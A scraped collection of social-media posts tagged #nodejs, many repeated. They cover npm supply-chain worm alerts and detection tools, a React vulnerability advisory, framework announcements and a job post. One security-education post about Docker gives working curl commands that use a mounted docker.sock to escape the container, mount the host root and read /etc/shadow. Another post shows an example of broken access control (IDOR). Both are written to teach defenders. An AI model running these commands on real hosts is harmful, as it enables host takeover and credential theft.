And to be clear this is a real vulnerability in React which still ought to be patched.

More details on these vulnerablities and how to mitigate is linked below 👇🏿

https://react2shell.com

#React2Shell #react #javascript #nodejs #cybersecurity

🚨 React disclosed a critical (CVSS 10.0) RCE in React Server Components. If you use RSC (often via frameworks like Next.js), upgrade react-server-dom-* to patched versions ASAP.

Details → https://socket.dev/blog/critical-security-vulnerability-in-react-server-components #NodeJS #React

🚨 React disclosed a critical (CVSS 10.0) RCE in React Server Components. If you use RSC (often via frameworks like Next.js), upgrade react-server-dom-* to patched versions ASAP.

Details → https://socket.dev/blog/critical-security-vulnerability-in-react-server-components #NodeJS #React

BotKitは、ActivityPubボットを作るためのTypeScriptフレームワークです。既存のMastodon/Misskeyボットとの違いは、ボット自体が独立したサーバーとして動作すること。プラットフォームのアカウントは不要です。

文字数制限もなければ、APIレート制限に悩まされることもありません。

bot.onMention = async (session, message) => {
  await message.reply(text`こんにちは、${message.actor}さん！`);
};

フェデレーション、HTTP Signatures、配送キューといったActivityPub周りの処理はFedifyがすべて引き受けます。ボットのロジックを書くだけです。

DenoでもNode.jsでも動きます。

https://botkit.fedify.dev/

#BotKit #Fedify #ActivityPub #TypeScript #Deno #NodeJS

BotKitは、ActivityPubボットを作るためのTypeScriptフレームワークです。既存のMastodon/Misskeyボットとの違いは、ボット自体が独立したサーバーとして動作すること。プラットフォームのアカウントは不要です。

文字数制限もなければ、APIレート制限に悩まされることもありません。

bot.onMention = async (session, message) => {
  await message.reply(text`こんにちは、${message.actor}さん！`);
};

フェデレーション、HTTP Signatures、配送キューといったActivityPub周りの処理はFedifyがすべて引き受けます。ボットのロジックを書くだけです。

DenoでもNode.jsでも動きます。

https://botkit.fedify.dev/

#BotKit #Fedify #ActivityPub #TypeScript #Deno #NodeJS

BotKitは、ActivityPubボットを作るためのTypeScriptフレームワークです。既存のMastodon/Misskeyボットとの違いは、ボット自体が独立したサーバーとして動作すること。プラットフォームのアカウントは不要です。

文字数制限もなければ、APIレート制限に悩まされることもありません。

bot.onMention = async (session, message) => {
  await message.reply(text`こんにちは、${message.actor}さん！`);
};

フェデレーション、HTTP Signatures、配送キューといったActivityPub周りの処理はFedifyがすべて引き受けます。ボットのロジックを書くだけです。

DenoでもNode.jsでも動きます。

https://botkit.fedify.dev/

#BotKit #Fedify #ActivityPub #TypeScript #Deno #NodeJS

These sorts of NPM worms have been around for a LONG time.

It's typically due a common practice of low 2fa opt-in on NPM accounts.

So be sure to setup NPM 2FA if you're a package maintainer do that asap!

A lesser known NPM capability is that you can disable install time scripts. This may break some packages but its worth a try to see if your projects can work with out any install scripts. 👇🏿

https://blog.npmjs.org/post/141702881055/package-install-scripts-vulnerability

#GitHub #NPM #Microsoft #Sha1Hulud #nodejs #javascript

Just finished writing another tool, now I can see NINE known compromised packages are still up for download on NPM! ⚠️

This tool crawls the list of known bad packages and downloads the latest bundle.

It then runs my other checks against the downloaded bundle and logs the results.

https://github.com/datapartyjs/walk-without-rhythm

#WalkWithoutRhythm #Sha1Hulud #NPM #GitHub #Microsoft #nodejs #javascript #cybersecurity #devlog #bash

Just finished writing another tool, now I can see NINE known compromised packages are still up for download on NPM! ⚠️

This tool crawls the list of known bad packages and downloads the latest bundle.

It then runs my other checks against the downloaded bundle and logs the results.

https://github.com/datapartyjs/walk-without-rhythm

#WalkWithoutRhythm #Sha1Hulud #NPM #GitHub #Microsoft #nodejs #javascript #cybersecurity #devlog #bash

I've spent the last few hours writing down my scripts for detecting this so you can use them!

I'm hitting on two or three ways to detect it and will be adding more.

Watching the attack running I can see developers all over the world still doing their morning `npm i` and getting owned 😭

Maybe let the node developers in your life know about this tool 👇🏿

https://github.com/datapartyjs/walk-without-rhythm

#ShaiHulud #WalkWithoutRhythm #nodejs #javascript #npm #github #cybersecurity

Updated my listing of Sha1-Hulud detection tools.

I now have found at least 12 other tools for detecting Sha1-Hulud compromise on your dev box and in infrastructure.

https://github.com/datapartyjs/walk-without-rhythm?tab=readme-ov-file#similar-sha1-hulud-112425-detection-tools

#WalkWithoutRhythm #Sha1Hulud #npm #github #nodejs #javascript #cybersecurity #devops

I've updated my suggestions to include links and info on how to get fine grained control over the scripts your projects run at compile time.

There's two fairly interesting community projects that seem to address this part of the problem and make it possible to disable most install scripts while keeping the ones your project actually requires.

https://github.com/datapartyjs/walk-without-rhythm?tab=readme-ov-file#steps-to-take

#Sha1Hulud #NPM #nodejs #javascript

Watt from Platformatic sounds interesting for improving Node.js server performance: https://blog.platformatic.dev/93-faster-nextjs-in-your-kubernetes

It's kinda like pm2 but using SO_REUSEPORT, so the kernel handles the load balancing and forwarding of requests to each node.js process.

#nodejs

#Breaking There's an active nodejs supply chain attack going around.

From the looks of it many of these compromised packages have been mitigated but quite a few have not.

https://helixguard.ai/blog/malicious-sha1hulud-2025-11-24

#nodejs #cybersecurity #aws #github #npm #trufflehog #go #cyberattack #ShaiHulud #javascript #deno #browser #Sha1Hulud

These sorts of NPM worms have been around for a LONG time.

It's typically due a common practice of low 2fa opt-in on NPM accounts.

So be sure to setup NPM 2FA if you're a package maintainer do that asap!

A lesser known NPM capability is that you can disable install time scripts. This may break some packages but its worth a try to see if your projects can work with out any install scripts. 👇🏿

https://blog.npmjs.org/post/141702881055/package-install-scripts-vulnerability

#GitHub #NPM #Microsoft #Sha1Hulud #nodejs #javascript

I spent more time searching for other Sha1-Hulud detection tools and found four more bringing it to 6 scanners (5 in nodejs).

Linked them all from my readme in case those work better for you.

Best way to beat a worm like this is to keep scanning and keep an eye out for the attacker to try and evade all of our tools.

By using more than one hopefully we make the attackers job harder to evade all of us.

https://github.com/datapartyjs/walk-without-rhythm?tab=readme-ov-file#similar-tools

#Sha1Hulud #WalkWithoutRhythm #nodejs #npm #github #microsoft

GitHub has almost finished taking down the stolen data posted by the Sha1-Hulud npm/github worm. I only see about 400 repos remaining of the around 23k created by the worm.

This was the most visible evidence of the exploit, just because we can't clearly see the worm's uploads doesn't mean the worm is totally dead yet.

#Sha1Hulud #GitHub #NPM #nodejs #cybersecurity

I spent more time searching for other Sha1-Hulud detection tools and found four more bringing it to 6 scanners (5 in nodejs).

Linked them all from my readme in case those work better for you.

Best way to beat a worm like this is to keep scanning and keep an eye out for the attacker to try and evade all of our tools.

By using more than one hopefully we make the attackers job harder to evade all of us.

https://github.com/datapartyjs/walk-without-rhythm?tab=readme-ov-file#similar-tools

#Sha1Hulud #WalkWithoutRhythm #nodejs #npm #github #microsoft

Just finished landing Exit Code support. So now if more scanners are made or one of the projects gets more features you can quickly switch to whichever makes the most sense for your use case!

I literally lost a ton of sleep on this volunteer incident response work so I'm going to go touch grass for a bit.

More hacks later tonight, still got some loose ends gnawing at me lol.

https://github.com/datapartyjs/walk-without-rhythm?tab=readme-ov-file#how-to-use

#nodejs #npm #javascript #Sha1Hulud #WalkWithoutRhythm #Sha1HuludScanner #cybersecurity

The fork of the CrowdStrike scanner introduced me to a really good idea, I should support the same exit code design so that our tools can work in tandem.

Maybe we detect different things or maybe one vs the other works in your environment.

So I made an issue to track this support:

https://github.com/datapartyjs/walk-without-rhythm/issues/18

#CrowdStrike #Sha1HuludScanner #WalkWithoutRhythm #cybersecurity #npm #nodejs

I located a second tool for detecting Sha1-Hulud infections. Haven't looked at the details of how it works.

Some notes:

This one appears to have been released by CrowdStrike and was paywalled. Someone decided to modify and release it publicly so license is unknown.

But awesome to see I'm in the big leagues with CrowdStrike and I maybe the first clean open source release of a tool for this.

https://github.com/TimothyMeadows/sha1hulud-scanner

#Sha1Hulud #Sha1HuludScanner #NPM #nodejs #cybersecurity #opensource

First pass is super simple and just looks for the file names & package.json signature for signs of infection anywhere in the path you tell it to search.

If it sees anything fishy it tells you where and stops until you've read the alert.

Oh and this only uses bash, sed, awk, grep, curl, and jq. So no npm, node or other big supply chains 🥴

https://github.com/datapartyjs/walk-without-rhythm/blob/main/check-projects

#ShalHulud #WalkWithoutRhythm #nodejs #npm #github #javascript

First pass is super simple and just looks for the file names & package.json signature for signs of infection anywhere in the path you tell it to search.

If it sees anything fishy it tells you where and stops until you've read the alert.

Oh and this only uses bash, sed, awk, grep, curl, and jq. So no npm, node or other big supply chains 🥴

https://github.com/datapartyjs/walk-without-rhythm/blob/main/check-projects

#ShalHulud #WalkWithoutRhythm #nodejs #npm #github #javascript

I'm quickly finding a mix of packages which were compromised, some were months ago and had the bad versions taken down.

However at the same time I'm noticing packages like the one below that were -just- hacked 19 hours ago and still have not been taken down yet!

With how this worm works its a bit of a pencils down moment... you probably should check your packages right now.

https://www.npmjs.com/package/capacitor-voice-recorder-wav?activeTab=code

#nodejs #npm #ShaiHulud #javascript

I've spent the last few hours writing down my scripts for detecting this so you can use them!

I'm hitting on two or three ways to detect it and will be adding more.

Watching the attack running I can see developers all over the world still doing their morning `npm i` and getting owned 😭

Maybe let the node developers in your life know about this tool 👇🏿

https://github.com/datapartyjs/walk-without-rhythm

#ShaiHulud #WalkWithoutRhythm #nodejs #javascript #npm #github #cybersecurity

Ok I've downloaded some of the compromised packages and you can search your already downloaded node modules for possibly infected packages using this command:

find ./node_modules -type f -name "bun_environment.js"

You can check your user level node cache using:

find ~/.npm -type f -name "bun_environment.js"

Still sizing this one up but if you get any hits check and see if they are big files (around 10MB) and if so you're likely infected.

#nodejs #npm #cybersecurity

Taking a second to understand the attack rate. I constructed this query below which shows you essentially an up to date listing of developers/code that's been compromised.

Once your box is infected and PII data has been found the worm then uses your github credentials to upload that content so ANYONE can now steal your credentials.

I'm finding multiple repos being popped every minute. This is an extremely active attack right now.

https://github.com/search?q=%22Sha1-Hulud%3A+The+Second+Coming.%22&type=repositories&s=updated&o=desc

#nodejs #npm #cybersecurity #github

I'm quickly finding a mix of packages which were compromised, some were months ago and had the bad versions taken down.

However at the same time I'm noticing packages like the one below that were -just- hacked 19 hours ago and still have not been taken down yet!

With how this worm works its a bit of a pencils down moment... you probably should check your packages right now.

https://www.npmjs.com/package/capacitor-voice-recorder-wav?activeTab=code

#nodejs #npm #ShaiHulud #javascript

#Breaking There's an active nodejs supply chain attack going around.

From the looks of it many of these compromised packages have been mitigated but quite a few have not.

https://helixguard.ai/blog/malicious-sha1hulud-2025-11-24

#nodejs #cybersecurity #aws #github #npm #trufflehog #go #cyberattack #ShaiHulud #javascript #deno #browser #Sha1Hulud

Blogged: **Aspire with Python, React, Rust and Node apps**

What's involved with integrating apps written with Python, Rust, Node and React/Vite with Aspire? Not that much as it turns out!

https://david.gardiner.net.au/2025/11/aspire-without-dotnet

#dotnet #aspire #rust #nodejs #pnpm #react #vite

Blogged: **Aspire with Python, React, Rust and Node apps**

What's involved with integrating apps written with Python, Rust, Node and React/Vite with Aspire? Not that much as it turns out!

https://david.gardiner.net.au/2025/11/aspire-without-dotnet

#dotnet #aspire #rust #nodejs #pnpm #react #vite

New blog post is up! This is a deep dive into continuation-passing style in TypeScript. (No, I'm not talking about asynchronous callbacks.)

https://jnkr.tech/blog/cps-in-ts

Let me know what you think and if you have any questions I can answer!

#TypeScript #JavaScript #FunctionalProgramming #Programming #NodeJS

New blog post is up! This is a deep dive into continuation-passing style in TypeScript. (No, I'm not talking about asynchronous callbacks.)

https://jnkr.tech/blog/cps-in-ts

Let me know what you think and if you have any questions I can answer!

#TypeScript #JavaScript #FunctionalProgramming #Programming #NodeJS

直近一週間分の睡眠データを、Gemini APIを利用して分析し、睡眠レポートを生成してメールで送信するコードを書きました。
生成されるレポートにいまいち納得感がないので、プロンプト含めプルリクお待ちしております！
#nodejs #gemini #fitbit

https://github.com/nove-b/fitbit-sleep-report

you benchmark your node/ruby/python software on your fancy new m4 mbp and celebrate 500ms response times.

I benchmark my rust software on a $30 potato computer that may as well have 256mb of RAM and celebrate 800ms response times.

we are not the same.

#Rust #RustLang #Python #NodeJS #Node #Ruby

and with that... I'm actively looking for my next contract, ideally something around ~20h/week. deep knowledge of #Python/#Django, long time #NodeJS Dev, talk to me about #WebComponents!

https://resume.oit.cloud

#FediHire #fedihired

and with that... I'm actively looking for my next contract, ideally something around ~20h/week. deep knowledge of #Python/#Django, long time #NodeJS Dev, talk to me about #WebComponents!

https://resume.oit.cloud

#FediHire #fedihired

🚀 Socket now integrates with Bun 1.3’s new Security Scanner API! @bunjavascript users can now protect their projects from malicious packages, typosquatting, & other supply chain attacks. Great to see Bun moving so quickly to protect developers at the package manager level with this new API!

https://socket.dev/blog/socket-integrates-with-bun-1-3-security-scanner-api #NodeJS #JavaScript

North Korea’s “Contagious Interview” campaign continues to weaponize npm: 338 malicious packages, 50K+ downloads. Leveraging typosquats, loader tweaks, and new aliases, it targets #crypto devs and job seekers via recruiter lures.

Full Report →
https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages #NodeJS

🚀 Socket now integrates with Bun 1.3’s new Security Scanner API! @bunjavascript users can now protect their projects from malicious packages, typosquatting, & other supply chain attacks. Great to see Bun moving so quickly to protect developers at the package manager level with this new API!

https://socket.dev/blog/socket-integrates-with-bun-1-3-security-scanner-api #NodeJS #JavaScript

North Korea’s “Contagious Interview” campaign continues to weaponize npm: 338 malicious packages, 50K+ downloads. Leveraging typosquats, loader tweaks, and new aliases, it targets #crypto devs and job seekers via recruiter lures.

Full Report →
https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages #NodeJS

🔒 If you publish packages to the npm registry and haven't already seen its new Trusted Publisher feature, please do take a look at https://docs.npmjs.com/trusted-publishers

🎟️ It uses short-lived OIDC tokens to allow CI-based automation of signed publish-with-provenance.

📈 According to https://github.com/sxzz/npm-top-provenance I maintain 6 of the top 50 packages that use this feature, and those 6 packages combined have over 600 million downloads each month!

#OpenSource #NodeJS #npm

🔒 If you publish packages to the npm registry and haven't already seen its new Trusted Publisher feature, please do take a look at https://docs.npmjs.com/trusted-publishers

🎟️ It uses short-lived OIDC tokens to allow CI-based automation of signed publish-with-provenance.

📈 According to https://github.com/sxzz/npm-top-provenance I maintain 6 of the top 50 packages that use this feature, and those 6 packages combined have over 600 million downloads each month!

#OpenSource #NodeJS #npm

Ω🪬Ω
#FediAlgo (the customizable timeline algorithm / filtering system for your Mastodon feed) v1.2.2 is deployed now. Has a switch that makes sure any #hashtags / users / etc. that you follow are displayed as filter options even if they don't meet the minimum number of recent toots threshold.

Also a bunch of bug fixes and small improvements.

* Try it here: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly outdated): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #javascript #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #node #nodejs #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo (the customizable timeline algorithm / filtering system for your Mastodon feed) v1.2.2 is deployed now. Has a switch that makes sure any #hashtags / users / etc. that you follow are displayed as filter options even if they don't meet the minimum number of recent toots threshold.

Also a bunch of bug fixes and small improvements.

* Try it here: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly outdated): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #javascript #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #node #nodejs #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo (the customizable timeline algorithm / filtering system for your Mastodon feed) v1.2.2 is deployed now. Has a switch that makes sure any #hashtags / users / etc. that you follow are displayed as filter options even if they don't meet the minimum number of recent toots threshold.

Also a bunch of bug fixes and small improvements.

* Try it here: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly outdated): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #javascript #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #node #nodejs #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo (the customizable timeline algorithm / filtering system for your Mastodon feed) v1.2.2 is deployed now. Has a switch that makes sure any #hashtags / users / etc. that you follow are displayed as filter options even if they don't meet the minimum number of recent toots threshold.

Also a bunch of bug fixes and small improvements.

* Try it here: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly outdated): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #javascript #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #node #nodejs #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo (the customizable timeline algorithm / filtering system for your Mastodon feed) v1.2.2 is deployed now. Has a switch that makes sure any #hashtags / users / etc. that you follow are displayed as filter options even if they don't meet the minimum number of recent toots threshold.

Also a bunch of bug fixes and small improvements.

* Try it here: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly outdated): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #javascript #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #node #nodejs #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

🚨 Multiple CrowdStrike packages trojanized in an ongoing npm supply chain attack: This is the same campaign that hit Tinycolor yesterday with identical malware.

Full list of compromised packages + mitigations →

https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm-packages #NodeJS #JavaScript

🚨 Multiple CrowdStrike packages trojanized in an ongoing npm supply chain attack: This is the same campaign that hit Tinycolor yesterday with identical malware.

Full list of compromised packages + mitigations →

https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm-packages #NodeJS #JavaScript

🚨 Multiple CrowdStrike packages trojanized in an ongoing npm supply chain attack: This is the same campaign that hit Tinycolor yesterday with identical malware.

Full list of compromised packages + mitigations →

https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm-packages #NodeJS #JavaScript

🚨 BREAKING: The DuckDB npm account was compromised. Malicious versions of duckdb, duckdb-wasm, and more were published early this morning with the same wallet-drainer malware seen in yesterday’s supply-chain attack. Check your dependencies!

https://socket.dev/blog/duckdb-npm-account-compromised-in-continuing-supply-chain-attack #NodeJS

🚨 BREAKING: The DuckDB npm account was compromised. Malicious versions of duckdb, duckdb-wasm, and more were published early this morning with the same wallet-drainer malware seen in yesterday’s supply-chain attack. Check your dependencies!

https://socket.dev/blog/duckdb-npm-account-compromised-in-continuing-supply-chain-attack #NodeJS

🚨 BREAKING: The DuckDB npm account was compromised. Malicious versions of duckdb, duckdb-wasm, and more were published early this morning with the same wallet-drainer malware seen in yesterday’s supply-chain attack. Check your dependencies!

https://socket.dev/blog/duckdb-npm-account-compromised-in-continuing-supply-chain-attack #NodeJS

Ω🪬Ω
#FediAlgo v1.1.19 is deployed. Minor bugfixes and improvements to the customizable timeline algorithm / filtering system for your Mastodon feed.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo v1.1.19 is deployed. Minor bugfixes and improvements to the customizable timeline algorithm / filtering system for your Mastodon feed.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo v1.1.19 is deployed. Minor bugfixes and improvements to the customizable timeline algorithm / filtering system for your Mastodon feed.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
#FediAlgo v1.1.19 is deployed. Minor bugfixes and improvements to the customizable timeline algorithm / filtering system for your Mastodon feed.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: I need to manage other containers on the node from my container, hmm...
devops1: Just mount /var/run/docker.sock into it and move on.

ItSec (walking by): Guys... a quick test. From inside that container, run:

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 

If you get JSON back, then you've handed that container admin-level control of the Docker daemon - so please don't...

devops0: So what? What does it mean?

Let's learn by example. The Docker CLI talks to the Docker daemon over a UNIX socket at (by default) /var/run/docker.sock [1]. That socket exposes the Docker Engine's REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. Now, the oops pattern we seeing:

# Dangerous: gives the container full control of the Docker daemon
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04

If an attacker gets any code execution in that container (RCE, webshell, deserialization bug, etc), they can pivot to the Docker host. Here's how in practice:

# 1) From the compromised container that "sees" docker.sock: create a "helper" container that bind-mounts the host root

# apt update && apt install -y curl

curl --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' \
  -X POST "http://localhost/containers/create?name=escape" \
  -d '{
        "Image": "ubuntu:24.04",
        "Cmd": ["sleep","infinity"],
        "HostConfig": { "Binds": ["/:/host:rw"] }
      }'

# 2) Start it
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/escape/start

From there, the attacker can shell in and operates on /host (add SSH keys, read secrets, drop binaries, whatever), or even chroots because why not:

# Read /etc/shadow of Docker Host using only curl, step 1:

curl --unix-socket /var/run/docker.sock -s \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/containers/escape/exec \
  -d '{
    "AttachStdout": true,
    "AttachStderr": true,
    "Tty": true,
      "Cmd": ["cat","/host/etc/shadow"]
  }'

# Step 2, read output of previous command (replace exec ID with yours):
curl --unix-socket /var/run/docker.sock -s --no-buffer \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/exec/1ec29063e5c13ac73b907f57470552dd39519bad293bf6677bedadaad9fcde89/start \
  -d '{"Detach": false, "Tty": true}' 

Keep in mind this isn't only an RCE issue: SSRF-style bugs can coerce internal services into calling local admin endpoints (including docker.sock or a TCP-exposed daemon).

And one more important point: we understand you may not like when texts like this include conditionals: if a container is compromised, if SSRF exists, then the socket becomes a bridge to owning the host. It's understandable. Our job, however, is to assume those "ifs" eventually happen and remove the easy paths for bad actors.

[1] https://docs.docker.com/reference/cli/dockerd/#daemon-socket-option
[2] https://docs.docker.com/engine/api/

Other grumpy stories:
1) https://infosec.exchange/@reynardsec/115048607028444198
2) https://infosec.exchange/@reynardsec/115014440095793678
3) https://infosec.exchange/@reynardsec/114912792051851956

#docker #devops #containers #security #kubernetes #cloud #infosec #sre #linux #php #nodejs #java #javascript #programming #cybersecurity #rust #python #js

Ω🪬Ω
New version (v1.1.0) of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, has a toggle switch to allow or disallow the selection of more than one filter option for when you're checking out your favourite hashtags.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
New version (v1.1.0) of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, has a toggle switch to allow or disallow the selection of more than one filter option for when you're checking out your favourite hashtags.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action (slightly out of date): https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

dev0: Big news - we finally upgraded every framework to the latest.
dev1: And the pipeline looks good: SAST, container scan, DAST... all green.
dev0: ItSec won't have anything to nitpick now!

ItSec (walking by): ... and BAC?
dev0: BAC?
ItSec: Broken Access Control [1]. Did you actually test for it?

dev1: What's he on about this time?

Let's learn by example: imagine an endpoint that returns a specific invoice.

GET /api/invoices/123
Authorization: Bearer <token-for-user-A>

User A legitimately fetches invoice 123. Now change only the ID:

GET /api/invoices/124
Authorization: Bearer <token-for-user-A>

If the app returns 200 with User B's data, you've got Broken Access Control (aka IDOR).

Even worse, try a write operation:

PATCH /api/invoices/124
Authorization: Bearer <token-for-user-A>

{"status": "paid"}

If that works... it's a problem.

Access control enforces who can do what on which resource. When it's broken, attackers can act outside their permissions: read others data, modify or delete it, or trigger business functions they shouldn't. In practice, this often comes from missing server-side checks that tie the caller to the resource owner (or an allowed role).

Why your shiny scanners may have missed it:

1) SAST sees code patterns, not ownership semantics (it can't deduce "invoice 124 belongs to User B").
2) DAST usually crawls with one session; it rarely performs cross-identity trials (User A poking at User B's data).
3) CI/CD "green checks" mean dependencies, images, and common vulns look fine - not that your authorization logic is correct.

What can you do?

1) Enforce checks on the server (never rely on the client): before every read/update/delete, verify the caller is the owner or has a permitted role.
2) Centralize authorization in a service/middleware.
3) Prefer opaque, unguessable IDs (UUIDs) over sequential integers, but still enforce server checks (UUIDs are not security).
4) Deny by default. Make allow-lists explicit.

[1] https://owasp.org/Top10/A01_2021-Broken_Access_Control/#description

#webdev #cybersecurity #programming #java #php #nodejs #javascript #infosec

The new integrated Markdown parser I’ve been implementing in Kitten has been kicking my ass for the past few weeks but I think I finally have it fully working and seamlessly so. Expect a new release this/next week that brings the parsing of Markdown pages (.page.md files) in your apps up to the standard of the recently-improved runtime Markdown parsing in Kitten HTML tagged-template strings (within `<markdown>…</markdown>` blocks).

The coolest thing is I was able to implement this without introducing any new syntax. In fact, I was able to simplify things so that you can now add arbitrary JavaScript to your Markdown pages within a multi-line script block in the YAML front matter (`script: |`) and use JavaScript string interpolation syntax in your Markdown (and, of course, Kitten components and conditionals, which, themselves, rely on string interpolation).

The only place where you have to deviate from standard Markdown in your Markdown pages is if you have JavaScript string interpolations or Kitten components/conditionals in code fences within your Markdown. In that case, you’ll have to escape them (e.g., `<\${Component} />`, `\<if \${something}>something\</if>`, etc.). And, to be fair, the person most impacted by this is likely me as the Kitten documentation at https://kitten.small-web.org is written in Kitten so I had a lot of escaping to do. But for any other use case, it means that things should just work and work exactly as they do in JavaScript pages (page.js files).

Anyway, so this is going to be a breaking change so I thought I’d give you (the three of you playing with Kitten right now?) a heads up. Of course, I’ll be updating the documentation to reflect all this.

(Remember, Kitten is in pre-release and it’s the framework I’m building/using to create Catalyst – the Small Web hosting solution – and Yarn – a small web – peer to peer – personal site app. So Kitten isn’t the means, not the end. And, at least until the Version 1 API freeze, things can and will break. That said, there’s nothing stopping you from playing with it now and, to be fair, at this point, such breaking changes should become rarer and rarer).

💕

